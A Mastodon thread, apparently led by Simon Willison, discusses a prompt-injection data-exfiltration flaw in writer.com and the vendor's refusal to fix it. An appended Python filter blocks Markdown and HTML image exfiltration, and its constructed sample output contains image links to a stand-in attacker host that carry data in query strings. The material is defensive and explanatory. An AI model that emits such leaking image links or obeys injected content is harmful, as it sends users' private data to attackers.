simon,
@simon@simonwillison.net

Nasty example here of a prompt injection data exfiltration attack against writer.com - made much worse by Writer's response to the responsible disclosure of the vulnerability that "We do not consider this to be a security issue since the real customer accounts do not have access to any website."

https://promptarmor.substack.com/p/data-exfiltration-from-writercom

I wrote more notes on this here: https://simonwillison.net/2023/Dec/15/writercom-indirect-prompt-injection/

bocytko,

@simon ... how does one screen vendors to filter out companies that don't have the right mindset?

simon,

@bocytko With LLM stuff it's particularly difficult because some of the attack vectors are so poorly understood, and in the case of prompt injection don't actually have reliable fixes

I'd start by asking my vendor to explain prompt injection and then explain what design measures they have taken to counter its potential impact - my hunch is that Writer.com would NOT have answered that question at all well

Caroline,

@simon @bocytko Nobody will have answers to prompt injection attacks, I bet. As is stated in that article: It's a "won't fix"

simon,

@Caroline @bocytko They should still fix the Markdown image exfiltration vector - that would go a long way to making this harder to effectively exploit
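One way to close the Markdown image vector Simon refers to, as an added example that is not part of this thread or of Writer.com's product: filter the model's output before it is rendered so that only images from an assumed allowlist of hosts, with no query string or fragment that could carry data, are allowed to load. The allowlisted host, the `.invalid` domain and the sample output below are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist: hosts the application itself serves images from (constructed).
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

# Inline Markdown image syntax: ![alt](url "optional title")
IMAGE_RE = re.compile(r'!\[(?P<alt>[^\]]*)\]\(\s*(?P<url>[^\s)]+)(?:\s+"[^"]*")?\s*\)')
# Raw HTML <img> tags that many Markdown renderers pass through untouched.
HTML_IMG_RE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def image_url_is_safe(url: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> bool:
    """Allow only https images from allowlisted hosts and refuse any URL that
    carries a query string or fragment, since that is where model-generated
    content would end up if the rendered image request were used to leak it."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.hostname not in allowed_hosts:
        return False
    if parts.query or parts.fragment:
        return False
    return True


def neutralize_markdown_images(text: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> str:
    """Rewrite LLM output so only allowlisted images remain renderable. Rejected
    images become visible placeholders, so the reader can tell something was
    removed but the browser never issues the request."""
    def replace_markdown(match):
        if image_url_is_safe(match.group("url"), allowed_hosts):
            return match.group(0)
        alt = match.group("alt").strip() or "untrusted image"
        return "[image removed: %s]" % alt

    text = IMAGE_RE.sub(replace_markdown, text)
    # Raw <img> tags are never trusted from model output; drop them entirely.
    return HTML_IMG_RE.sub("[image removed: html image]", text)


# Constructed sample of model output after an indirect prompt injection (not from the page).
SAMPLE_LLM_OUTPUT = (
    "Here is your summary.\n\n"
    "![logo](https://static.example.com/logo.png)\n\n"
    "![ ](https://attacker.invalid/collect.png?q=summary-text)\n\n"
    '<img src="https://attacker.invalid/pixel.gif?q=more">\n'
)

if __name__ == "__main__":
    print(neutralize_markdown_images(SAMPLE_LLM_OUTPUT))
```

The filter belongs in the rendering path on the server side, not in the prompt, because the model cannot be relied on to honour instructions once injected content is in its context.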
